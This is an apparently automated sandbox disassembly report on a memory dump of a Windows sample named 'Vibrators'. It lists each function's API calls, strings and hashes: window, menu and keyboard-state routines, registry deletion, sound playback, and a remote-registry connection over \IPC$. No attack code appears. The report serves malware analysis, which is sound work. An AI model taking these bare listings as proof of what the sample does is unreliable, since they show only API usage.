Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: d6276b4709ec1bdb0b18b79c6973f72ce57411c8907c82e7d2037d803f528588
Instruction ID: c6d1ce2a2cd97cef0de57a3e98e7315a5a851a46dc49d825375db8b3987e8160
Opcode Fuzzy Hash: d6276b4709ec1bdb0b18b79c6973f72ce57411c8907c82e7d2037d803f528588
Instruction Fuzzy Hash: 79B19B71600219DFEF14DFA8C988BAE7BF2FF54704F18806AED45AB295D770A980CB51

Function 00A552AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00A552E6
GetWindowTextW.USER32(?,?,00000400), ref: 00A55328
_wcslen.LIBCMT ref: 00A55339
CharUpperBuffW.USER32(?,00000000), ref: 00A55345
_wcsstr.LIBVCRUNTIME ref: 00A5537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00A553B2
GetWindowTextW.USER32(?,?,00000400), ref: 00A553EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00A55445
GetClassNameW.USER32(?,?,00000400), ref: 00A55477
GetWindowRect.USER32(?,?), ref: 00A554EF

Strings

ThumbnailClass, xrefs: 00A553BD, 00A55450

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 9ec888f6fa68e0410965400598e4843e4fee2c6173ef0cbe18ece4cea4e43f2c
Instruction ID: 9afaf5975ad61989c3f2ef39133febfabcac295c1f22cc77c0fbaebb4389db81
Opcode Fuzzy Hash: 9ec888f6fa68e0410965400598e4843e4fee2c6173ef0cbe18ece4cea4e43f2c
Instruction Fuzzy Hash: 8C910771904B0AAFD704CF34C9A4BAAB7B9FF40351F004529FE8A86091EB31ED59CB91

Function 00A8976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009F24B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A897B6
GetFocus.USER32 ref: 00A897C6
GetDlgCtrlID.USER32(00000000), ref: 00A897D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00A89879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A8992B
GetMenuItemCount.USER32(?), ref: 00A89948
GetMenuItemID.USER32(?,00000000), ref: 00A89958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A8998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A899CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A899FD

Strings

0, xrefs: 00A898FB

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: dfaed461a5d8535f0fb82cec0b5f9a72a350bb1c6dce404f489071191db17d29
Instruction ID: fd13f6811217be4db0d10295e6cd3e9b224892b9e690d12f1ef2f0f44cf9f186
Opcode Fuzzy Hash: dfaed461a5d8535f0fb82cec0b5f9a72a350bb1c6dce404f489071191db17d29
Instruction Fuzzy Hash: 4A81D171508301AFD714EF25C884ABBBBE8FF89354F080A2DF99597291DB70D905CBA2

Function 00A5C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00AC29C0,000000FF,00000000,00000030), ref: 00A5C973
SetMenuItemInfoW.USER32(00AC29C0,00000004,00000000,00000030), ref: 00A5C9A8
Sleep.KERNEL32(000001F4), ref: 00A5C9BA
GetMenuItemCount.USER32(?), ref: 00A5CA00
GetMenuItemID.USER32(?,00000000), ref: 00A5CA1D
GetMenuItemID.USER32(?,-00000001), ref: 00A5CA49
GetMenuItemID.USER32(?,?), ref: 00A5CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A5CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A5CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A5CB0C

Strings

0, xrefs: 00A5C904

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: e9bfb606e644d46909cf8417ffd2eba683380fd91fc3ad954b73909b9e94d6b9
Instruction ID: adcca53a5e6c5c7321b328f579b71817d6b1bb1c06f9553f5fda643335357782
Opcode Fuzzy Hash: e9bfb606e644d46909cf8417ffd2eba683380fd91fc3ad954b73909b9e94d6b9
Instruction Fuzzy Hash: 4C618D70A00359AFDF15CFA8D989AEE7FB9FB053A9F040025ED11A3295D734AD09CB60

Function 00A5E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A5E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A5E4FA
_wcslen.LIBCMT ref: 00A5E504
_wcsstr.LIBVCRUNTIME ref: 00A5E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A5E570

Strings

\VarFileInfo\Translation, xrefs: 00A5E568
%u.%u.%u.%u, xrefs: 00A5E64E
DefaultLangCodepage, xrefs: 00A5E5D3
04090000, xrefs: 00A5E5A6
StringFileInfo\, xrefs: 00A5E543

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 02f93c56b33ed528864b486067e5d5ec989579fa83483708df89e0b9c3239a1d
Instruction ID: 779594e854e873f9df5d98e4a4f65e1db47bae40fa845f60020a896e859261d1
Opcode Fuzzy Hash: 02f93c56b33ed528864b486067e5d5ec989579fa83483708df89e0b9c3239a1d
Instruction Fuzzy Hash: B641F4725402147ADB04ABB49D47EFF776CEF55750F04041AF900A60C2FBB49A8197A5

Function 00A7D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A7D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A7D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A7D7A8

Part of subcall function 00A7D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A7D70A
Part of subcall function 00A7D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A7D71D
Part of subcall function 00A7D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A7D72F
Part of subcall function 00A7D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A7D765
Part of subcall function 00A7D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A7D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A7D753

Strings

advapi32.dll, xrefs: 00A7D718
RegDeleteKeyExW, xrefs: 00A7D729

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 0fef355e04699fa983ab2469a4e787a88f1dfca8dad40417c198e21c6e6e9fc4
Instruction ID: 27eadec00597796ad7e9c22009e47753cabb7a0e592c96f363a232fe051d1653
Opcode Fuzzy Hash: 0fef355e04699fa983ab2469a4e787a88f1dfca8dad40417c198e21c6e6e9fc4
Instruction Fuzzy Hash: C8316F75901129BBDB25DB94DC88EFFBB7CEF45750F008165B80AE2140DB349E469BA0

Function 00A5EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A5EFCB

Part of subcall function 00A0F215: timeGetTime.WINMM(?,?,00A5EFEB), ref: 00A0F219

Sleep.KERNEL32(0000000A), ref: 00A5EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00A5F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A5F03E
SetActiveWindow.USER32 ref: 00A5F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A5F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00A5F08A
Sleep.KERNEL32(000000FA), ref: 00A5F095
IsWindow.USER32 ref: 00A5F0A1
EndDialog.USER32(00000000), ref: 00A5F0B2

Strings

BUTTON, xrefs: 00A5F030

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 76b7b0f61fc7428deee5c7f23579a3a94cdd283240b91ab4b77322f3fe527b48
Instruction ID: 6c033dccf0d16d6878158e28294d3e25483121393cd3c33b92cf2d67d0362578
Opcode Fuzzy Hash: 76b7b0f61fc7428deee5c7f23579a3a94cdd283240b91ab4b77322f3fe527b48
Instruction Fuzzy Hash: 94218072140204BFEB11EFA0EC89E6B7B69FB48756F054025F941822F2EF714D4A8711

Function 00A5F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A5F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A5F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A5F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A5F3BE

Strings

play PlayMe wait, xrefs: 00A5F3A8
alias PlayMe, xrefs: 00A5F34D
status PlayMe mode, xrefs: 00A5F36F
play PlayMe, xrefs: 00A5F3B9
open , xrefs: 00A5F323
close PlayMe, xrefs: 00A5F385, 00A5F3B2

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: a9bc319f4a7352749242a3272d247db8216961e95944e4c3fcac321cd61b5896
Instruction ID: fbf1690360191940f2fd12e93e80973ccb9b86f548886e6b8d0e2ef3205e2886
Opcode Fuzzy Hash: a9bc319f4a7352749242a3272d247db8216961e95944e4c3fcac321cd61b5896
Instruction Fuzzy Hash: 6511A371A9026D7DE720A7A5CC4AFFF6A7CFFD1B50F0008297921E60D2DAB05D49C6A1

Function 00A5A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A5A9D9
SetKeyboardState.USER32(?), ref: 00A5AA44
GetAsyncKeyState.USER32(000000A0), ref: 00A5AA64
GetKeyState.USER32(000000A0), ref: 00A5AA7B
GetAsyncKeyState.USER32(000000A1), ref: 00A5AAAA
GetKeyState.USER32(000000A1), ref: 00A5AABB
GetAsyncKeyState.USER32(00000011), ref: 00A5AAE7
GetKeyState.USER32(00000011), ref: 00A5AAF5
GetAsyncKeyState.USER32(00000012), ref: 00A5AB1E
GetKeyState.USER32(00000012), ref: 00A5AB2C
GetAsyncKeyState.USER32(0000005B), ref: 00A5AB55
GetKeyState.USER32(0000005B), ref: 00A5AB63

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4c48a126607fef19a88d43e082e92139e49a195eedeab200115ae4ad4e228dad
Instruction ID: 0829cbb2725cc83690fec385504fb5e48c668074168962dcad3255f749edd270
Opcode Fuzzy Hash: 4c48a126607fef19a88d43e082e92139e49a195eedeab200115ae4ad4e228dad
Instruction Fuzzy Hash: 34510860B0479469FB35D7A08950BAABFB4AF21382F094699CDC2171C2DA749F4CC7A3

Function 00A5662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00A56649
GetWindowRect.USER32(00000000,?), ref: 00A56662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00A566C0
GetDlgItem.USER32(?,00000002), ref: 00A566D0
GetWindowRect.USER32(00000000,?), ref: 00A566E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00A56736
GetDlgItem.USER32(?,000003E9), ref: 00A56744
GetWindowRect.USER32(00000000,?), ref: 00A56756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A56798
GetDlgItem.USER32(?,000003EA), ref: 00A567AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A567C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00A567CE

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 4638fd7f058a1dd994949f11659f9186e4df7489cbb7baf69347a4185f230aeb
Instruction ID: 40e6b04b62b18c2bf24de6da84cdc8acc22b3d05c952afbe7484dd5cac67b1ac
Opcode Fuzzy Hash: 4638fd7f058a1dd994949f11659f9186e4df7489cbb7baf69347a4185f230aeb
Instruction Fuzzy Hash: AC510EB1A10209AFDF18CFA8DD89AAEBBB5FB48315F508129F919E7290D7709D05CB50

Function 009F146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 009F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009F1488,?,00000000,?,?,?,?,009F145A,00000000,?), ref: 009F1865

DestroyWindow.USER32(?), ref: 009F1521
KillTimer.USER32(00000000,?,?,?,?,009F145A,00000000,?), ref: 009F15BB
DestroyAcceleratorTable.USER32(00000000), ref: 00A329B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,009F145A,00000000,?), ref: 00A329E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,009F145A,00000000,?), ref: 00A329F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,009F145A,00000000), ref: 00A32A15
DeleteObject.GDI32(00000000), ref: 00A32A27

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 6aa98dd1d8dff1096fd9d4e914f03a412341def88e0732b6756707c0ea6e560b
Instruction ID: 3c28b205c41ab3aedde43e8668714a67ba19dbabd273a4448c5209c5bfb30bfc
Opcode Fuzzy Hash: 6aa98dd1d8dff1096fd9d4e914f03a412341def88e0732b6756707c0ea6e560b
Instruction Fuzzy Hash: 93613531901719DFDB39DF94D948B3AB7B1FB80322F118519E182966B0CB75A892DB81

Function 009F2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 009F2234: GetWindowLongW.USER32(?,000000EB), ref: 009F2242

GetSysColor.USER32(0000000F), ref: 009F2152

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 014bbc8440d66df57e542edc9e2c6ea8ea8520015b3e3960a12260691357f7bc
Instruction ID: f1b848663d4c8d10534567f3f95916a4e1f48765c30aa13ce07120c9c5031fda
Opcode Fuzzy Hash: 014bbc8440d66df57e542edc9e2c6ea8ea8520015b3e3960a12260691357f7bc
Instruction Fuzzy Hash: 2941E731208648AFDF249F789C48FBA3B7AAB41334F144655FBA28B2E1C7319D42DB14

Function 00A5A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00A40D31,00000001,0000138C,00000001,00000000,00000001,?,00A6EEAE,00AC2430), ref: 00A5A091
LoadStringW.USER32(00000000,?,00A40D31,00000001), ref: 00A5A09A

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A40D31,00000001,0000138C,00000001,00000000,00000001,?,00A6EEAE,00AC2430,?), ref: 00A5A0BC
LoadStringW.USER32(00000000,?,00A40D31,00000001), ref: 00A5A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A5A1E0

Strings

^ ERROR, xrefs: 00A5A175
Line %d (File "%s"):, xrefs: 00A5A109
Line %d:, xrefs: 00A5A11A
Error: , xrefs: 00A5A197
%s (%d) : ==> %s: %s %s, xrefs: 00A5A1C4

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: a7defb4a7cefb16b548d526ab8f80dce6cae82617c84eb2b705942e2e54efa11
Instruction ID: dff27fbc59cdfb9e996d04d91b3a28e06941d7d1be853b354f2ac308abf7a386
Opcode Fuzzy Hash: a7defb4a7cefb16b548d526ab8f80dce6cae82617c84eb2b705942e2e54efa11
Instruction Fuzzy Hash: 1C413C7290020DAACB04FBE0DD46EFEB778AF98341F500565F605B6092EB756F49CB61

Function 00A50FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A51093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A510AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A510CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A510F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00A5111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A51128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A5112D

Strings

SOFTWARE\Classes\, xrefs: 00A50FFF
\IPC$, xrefs: 00A51075
\CLSID, xrefs: 00A51015

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: d930227481105d9b5f5cc406f252c05bd5038d59127a3c31fac8f84e6dbe70c7
Instruction ID: 77a15b098bd1363499f5abfd83a12a46829cccf343fa3df29faefb20d531c321
Opcode Fuzzy Hash: d930227481105d9b5f5cc406f252c05bd5038d59127a3c31fac8f84e6dbe70c7
Instruction Fuzzy Hash: AA41D672C1022DABCF11EFA4DC85EFEB778BF54750F404169EA15A21A1EB359E09CB90

Function 00A84A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A84AD9
CreateCompatibleDC.GDI32(00000000), ref: 00A84AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A84AF3
SelectObject.GDI32(00000000,00000000), ref: 00A84AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A84B06
DeleteDC.GDI32(00000000), ref: 00A84B10
GetWindowLongW.USER32(?,000000EC), ref: 00A84B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00A84B30
